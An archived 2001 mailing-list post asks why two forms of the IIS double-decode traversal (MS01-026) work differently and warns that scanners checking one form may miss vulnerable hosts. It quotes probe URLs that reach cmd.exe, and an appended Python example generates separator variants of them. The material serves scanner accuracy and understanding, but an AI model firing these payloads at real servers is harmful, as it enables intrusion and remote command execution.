Hi all.

Strange thing with the double decode problem on IIS. Refer: http://www.microsoft.com/technet/security/bulletin/MS01-026.asp

Most scanners (including the Nessus plugin) check for the problem using the following string:

/directory/..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir

(replace "directory" with an executable directory, and replace %255c with any combination of the double encoded string). It seems to work fine (I have seen this as the only vulnerability on a box and the scanner picks it up nicely).

However, I have found two boxes (one IISv4 and one IISv5) where it does not work. The weird thing is this: the following string

/directory/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir

DOES work. The only difference is the ../ in front of /winnt/system32/blah.

A note: if you are using a scanner that only checks for the first string, please update; your site might be vulnerable. Arirang scanner does this check properly.

Why is this so? Are there two different problems here? Any comments?

Regards,
Roelof.
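Added example (not from the post, and not the Nessus or Arirang check): a small Python model of the two-stage decoding that MS01-026 describes (decode once, run a path check, decode again), plus a generator for the two probe forms quoted above. The traversal check here is a deliberately naive stand-in, assumed for illustration; it is not IIS code and does not explain why the two hosts behaved as the poster saw. What it does show is one observable difference between the two strings: after a single decode, the first form still contains a literal "../" segment, while the second form does not, so a check that only looks at the once-decoded text reacts to them differently.

```python
"""Model of double-decode path checks and probe generation for the
MS01-026 traversal. Added example; simplified, not IIS's real logic."""
from urllib.parse import unquote


def decode_once(uri: str) -> str:
    """One level of %XX decoding: '%255c' -> '%5c', '%5c' -> '\\'."""
    return unquote(uri)


def has_literal_traversal(path: str) -> bool:
    """Naive stand-in check (assumption for this example): reject any
    '../' or '..\\' that is visible in the text as given."""
    return "../" in path or "..\\" in path


def simulate_double_decode(uri: str) -> dict:
    """Decode once, apply the naive check, then decode again, which is
    the ordering MS01-026 describes. Returns every intermediate value so
    the effect of the second decode is visible."""
    once = decode_once(uri)
    blocked = has_literal_traversal(once)
    twice = decode_once(once)
    return {
        "after_first_decode": once,
        "blocked_by_check": blocked,
        "after_second_decode": twice,
        "traversal_after_second_decode": has_literal_traversal(twice),
    }


def build_probes(directory: str = "directory", depth: int = 4,
                 sep: str = "%255c") -> tuple:
    """Return (form_with_extra_dotdot, form_without) exactly as quoted in
    the post. 'directory', depth and sep are the knobs the post mentions
    (executable directory, and any double-encoded separator)."""
    hops = ("..%s" % sep) * depth
    target = "winnt/system32/cmd.exe?/c+dir"
    with_extra_dotdot = "/%s/%s../%s" % (directory, hops, target)
    without = "/%s/%s%s" % (directory, hops, target)
    return with_extra_dotdot, without


# Double-encoded separators that all decode to '\\' or '/' in two passes.
# Constructed list for this example; not an exhaustive set.
DOUBLE_ENCODED_SEPARATORS = ("%255c", "%252f", "%25%35%63")


def all_probe_variants(directory: str = "directory", depth: int = 4) -> list:
    """Both probe forms for every separator above, so a scanner check
    does not stop at the single string the post warns about."""
    variants = []
    for sep in DOUBLE_ENCODED_SEPARATORS:
        variants.extend(build_probes(directory, depth, sep))
    return variants


if __name__ == "__main__":
    for probe in build_probes():
        result = simulate_double_decode(probe)
        print(probe)
        for key, value in result.items():
            print("   %-30s %s" % (key, value))
```

Running it prints both probe forms with their once-decoded and twice-decoded text; only the second form passes the naive once-decoded check and still yields "..\" segments after the second decode. Whether that is the actual reason for the behaviour on the two boxes is the open question in the post, not something this model settles.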
This archive was generated by hypermail 2b30 : Wed Jul 04 2001 - 12:38:57 PDT